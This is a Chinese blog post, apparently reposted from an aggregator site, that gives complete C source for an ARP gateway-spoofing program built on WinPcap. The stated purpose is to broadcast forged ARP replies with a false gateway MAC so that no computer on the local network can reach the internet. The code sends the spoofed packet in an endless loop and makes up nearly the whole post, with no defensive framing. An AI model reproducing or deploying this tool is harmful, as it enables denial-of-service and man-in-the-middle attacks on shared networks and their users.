向局域網發送ARP應答包，向局域網所有主機發送錯誤的網關MAC地址，這樣所有的計算機都不能上網了

源代碼


環境 ：windows xp ，vs2008，安裝winpacp


開發包：winpacp


字符集：ASCII

#define WINVER 0x5001 //win xp #define HAVE_REMOTE #include <stdio.h> #include <pcap.h> #include <Packet32.h> #include <windows.h> #include <shlwapi.h>#pragma comment(lib,"shlwapi.lib") #pragma comment(lib,"wpcap.lib") #pragma comment(lib,"Packet.lib")#define EPT_IP 0x0800//IP協議 #define EPT_ARP 0x0806//ARP協議 #define EPT_RARP 0x8035// RARP協議 #define ARP_HARDWARE 0x0001/802.3 以太網 #define ARP_REQUEST 0x0001 //ARP 請求 #define ARP_REPLY 0x0002// ARP 應答 #define Max_Num_Adapter 10 #pragma pack(push, 1) typedef struct ehhdr { unsigned char eh_dst[6]; //目標MAC地址unsigned char eh_src[6]; //源MAC地址unsigned short eh_type; //幀類型 } EHHDR, *PEHHDR;typedef struct arphdr { unsigned short arp_hrd; //hardware unsigned short arp_pro; //protocol unsigned char arp_hln; //6unsigned char arp_pln; //4unsigned short arp_op; //ARP/RARP選項 unsigned char arp_sha[6]; //發送者MACunsigned long arp_spa; //發送者IPunsigned char arp_tha[6]; //目標MACunsigned long arp_tpa; //目標IP }ARPHDR, *PARPHDR; //獲得MAC void GetMacAddr(char *MacAddr,unsigned char *pbuff) { char temp[5]="0x\0\0";char *temp_1=temp+2;int n;for(int i=0;i<12;i+=2){memcpy(temp_1,MacAddr,2);StrToIntEx(temp,STIF_SUPPORT_HEX,&n);pbuff[i/2]=(unsigned char)n;MacAddr+=2;}} //ARP包結構 typedef struct arpPacket { EHHDR ehhdr; ARPHDR arphdr; } ARPPACKET, *PARPPACKET; #pragma pack(pop) int main() {static char AdapterList[Max_Num_Adapter][1024]; char szPacketBuf[600]; LPADAPTER lpAdapter; LPPACKET lpPacket; char AdapterName[2048]; char *temp, *temp1; ARPPACKET ARPPacket; ULONG AdapterLength = 1024; int AdapterNum = 0; int nRetCode, i;//獲得適配器列表 if (PacketGetAdapterNames(AdapterName, &AdapterLength) == FALSE) { printf("不能獲得適配器列表!\n"); return 0; }//處理適配器名temp = AdapterName; temp1 = AdapterName; i = 0; while ((*temp != '\0') || (*(temp - 1) != '\0')) { if (*temp == '\0') {memcpy(AdapterList[i], temp1, (temp - temp1)); temp1 = temp + 1; i++; } temp++; }AdapterNum = i; for (i = 0; i < AdapterNum; i++)printf("\n%d- %s\n", i + 1, AdapterList[i]); printf("請輸入適配器的序號:");int nSelect;scanf("%d",&nSelect);//打開適配器lpAdapter = (LPADAPTER)PacketOpenAdapter(AdapterList[nSelect-1]);if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { nRetCode = GetLastError(); printf("不能打開驅動，錯誤碼為: %lx\n", nRetCode); return 1; }//分配包內存lpPacket=PacketAllocatePacket();if (lpPacket == NULL) { printf("錯誤：分配包內存空間失敗!\n");return 2; }ZeroMemory(szPacketBuf, sizeof(szPacketBuf));GetMacAddr("28C0DA06EC84",ARPPacket.ehhdr.eh_src);//源MAC地址GetMacAddr("FFFFFFFFFFFF",ARPPacket.ehhdr.eh_dst);//MAC廣播ARPPacket.ehhdr.eh_type=htons(EPT_ARP);ARPPacket.arphdr.arp_hrd=htons(ARP_HARDWARE);ARPPacket.arphdr.arp_pro=htons(EPT_IP);ARPPacket.arphdr.arp_hln=6;ARPPacket.arphdr.arp_pln=4;ARPPacket.arphdr.arp_op=htons(ARP_REPLY);GetMacAddr("28C0DA06EC88",ARPPacket.arphdr.arp_sha);//()發送者MAC，假的ARPPacket.arphdr.arp_spa=inet_addr("114.213.68.1");//網關IPGetMacAddr("FFFFFFFFFFFF",ARPPacket.arphdr.arp_tha);//廣播MACARPPacket.arphdr.arp_tpa=inet_addr("255,255,255,255");//廣播IPmemcpy(szPacketBuf, (char*) &ARPPacket, sizeof(ARPPacket));PacketInitPacket(lpPacket, szPacketBuf, 60);//初始化包if (PacketSetNumWrites(lpAdapter, 2) == FALSE) {printf("警告: Unable to send more than one packet in a single write ! \n ");getchar();}//不停發送ARP欺騙包while(true){if (PacketSendPacket(lpAdapter, lpPacket, TRUE) == FALSE) { printf("Error sending the packets!\n"); getchar();return 3; } }printf("Send ok!\n"); //關閉包并退出PacketFreePacket(lpPacket); PacketCloseAdapter(lpAdapter);scanf("%d",&i);return 0; }

總結

以上是生活随笔為你收集整理的ARP网关欺骗程序的实现(vs2008 winpacp)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。